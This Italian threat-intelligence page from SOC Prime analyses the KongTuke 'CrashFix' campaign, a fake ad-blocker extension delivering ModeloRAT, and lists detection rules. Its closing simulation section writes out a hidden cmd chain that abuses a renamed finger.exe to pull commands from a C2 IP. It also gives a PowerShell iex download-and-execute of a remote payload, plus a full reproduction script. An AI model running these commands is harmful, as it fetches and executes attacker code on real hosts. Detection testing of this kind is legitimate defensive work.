SOC Prime Bias: Critico

21 Jan 2026 16:34 UTC

Dissezionare CrashFix: Il Nuovo Giocattolo di KongTuke

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Dissezionare CrashFix: Il Nuovo Giocattolo di KongTuke
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

KongTuke ha distribuito un’estensione maligna di Chrome, NexShield, imitando uBlock Origin Lite. Una volta installata, visualizza un avviso di sicurezza “CrashFix” per simulare un incidente di sicurezza del browser legittimo, blocca il browser e costringe l’utente a eseguire un comando PowerShell malevolo copiato negli appunti. La campagna distribuisce un RAT in Python, ModeloRAT, su sistemi collegati al dominio e una catena PowerShell a più stadi su host stand-alone.

Indagine

Gli analisti di Huntress hanno esaminato il codice dell’estensione, collegato il comando e controllo a nexsnield.com e effettuato il reverse engineering dei payload. Hanno osservato un abuso di finger.exe come LOLBin per recuperare le istruzioni degli attaccanti, oltre a un DGA che genera domini .top. Per gli ambienti su dominio, i ricercatori hanno identificato un impianto Python cifrato RC4 che persiste tramite la chiave HKCU Run. Altre tecniche includevano controlli anti-analisi, Bypass di AMSI, e tattiche di esaurimento delle risorse intese a indurre gli utenti a conformarsi rapidamente.

Mitigazione

Bloccare l’ID dell’estensione di Chrome e monitorare le estensioni sconosciute che impersonano noti blocca-pubblicità. Rilevare il beaconing verso nexsnield.com, gli IP C2 e domini prodotti dal DGA. Applicare il controllo dell’esecuzione per limitare l’uso di LOLBin (incluso finger.exe) e allertare su valori Run-key sospetti, specialmente nomi progettati per somigliare a software ampiamente utilizzati.

Risposta

Allertare sulle installazioni di estensioni relative a NexShield e correlare con connessioni in uscita verso l’infrastruttura C2 e DGA identificata. Isolare gli host colpiti e raccogliere artefatti delle estensioni, chiavi di registro di Run, task schedulati e file scaricati. Rimuovere la persistenza di ModeloRAT, eradicare i componenti degli stadi PowerShell e rimedialee validare l’endpoint.

Flusso di attacco

Rilevamenti

Chiamata a Metodi .NET Sospetti tramite PowerShell (via powershell)

Team SOC Prime
21 Gen 2026

Uso Sospetto di CURL (via cmdline)

Team SOC Prime
21 Gen 2026

Nome Breve del File (via cmdline)

Team SOC Prime
21 Gen 2026

Possibile Operazione Manuale o di Scripting Eseguita in Cartelle Insolite (via cmdline)

Team SOC Prime
21 Gen 2026

Stringhe PowerShell Sospette (via powershell)

Team SOC Prime
21 Gen 2026

Chiamata a Funzioni API di Windows Sospette da PowerShell (via powershell)

Team SOC Prime
21 Gen 2026

Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)

Team SOC Prime
21 Gen 2026

Un Archivio è Stato Estratto in una Directory Sospetta con PowerShell (via powershell)

Team SOC Prime
21 Gen 2026

Esecuzione di Python da Cartelle Sospette (via cmdline)

Team SOC Prime
21 Gen 2026

Possibili Indicatori di Offuscamento PowerShell (via powershell)

Team SOC Prime
21 Gen 2026

Possibile Enumerazione del Sistema (via cmdline)

Team SOC Prime
21 Gen 2026

Download o Upload tramite PowerShell (via cmdline)

Team SOC Prime
21 Gen 2026

IOCs (SourceIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke

Regole AI di SOC Prime
21 Gen 2026

IOCs (HashSha256) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke

Regole AI di SOC Prime
21 Gen 2026

IOCs (DestinationIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke

Regole AI di SOC Prime
21 Gen 2026

IOCs (Email) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke

Regole AI di SOC Prime
21 Gen 2026

Rileva l’Esecuzione di Comandi Malevoli di KongTuke CrashFix [Creazione Processo di Windows]

Regole AI di SOC Prime
21 Gen 2026

Rilevamento del Bypass di AMSI e Rimozione di Evidenze tramite PowerShell [Windows Powershell]

Regole AI di SOC Prime
21 Gen 2026

Esecuzione di Simulazione

Prerequisito: Il Controllo Prevolo di Telemetria & Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrativa dell’Attacco e Comandi:
    L’avversario prima copia il legittimo finger.exe binario nella directory temporanea, lo rinomina come ct.exe, e poi utilizza una catena nidificata cmd /c per invocare il binario copiato con un argomento elaborato che contatta un server remoto C2 (199.217.98.108). Il binario trasmette il payload al prompt dei comandi, che viene quindi indirizzato in un secondo cmd cmd Invoke‑WebRequest e lo esegue immediatamente con iex. Tutti i passaggi sono eseguiti con un’interfaccia utente minima (/min) per evitare il rilevamento da parte dell’utente.

     1. Copia finger.exe → %TEMP%ct.exe
    2. Esegui: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"
    3. Download & esecuzione di payload secondari con PowerShell:
       powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
  • Script di Test di Regressione: Lo script qui sotto riproduce l’intera catena di attacco su una macchina di test Windows. Eseguire in una sessione PowerShell elevata.

    #-------------------------------------------------
    # Esecuzione di Comandi Malevoli KongTuke CrashFix
    #-------------------------------------------------
    # 1. Distribuire il LOLBin (finger.exe) in %TEMP% come ct.exe
    $fingerPath = "$env:windirsystem32finger.exe"
    $tempExe    = "$env:TEMPct.exe"
    Copy-Item -Path $fingerPath -Destination $tempExe -Force
    
    # 2. Eseguire la catena cmd malevola (corrisponde alla regola Sigma)
    $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"'
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden
    
    # 3. Download web tramite PowerShell ed esecuzione del payload secondario
    $payloadUrl = 'http://199.217.98.108/payload.ps1'
    $psCommand  = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden
    #-------------------------------------------------
  • Comandi di Pulizia: Rimuovere gli artefatti e terminare eventuali processi residui creati dal test.

    # Elimina il ct.exe copiato
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # Uccidi eventuali processi cmd.exe o powershell.exe rimasti avviati dal test (filtra per riga di comando specifica)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # Opzionale: cancella Log Eventi se necessario per ripetibilità
    # wevlutil cl Security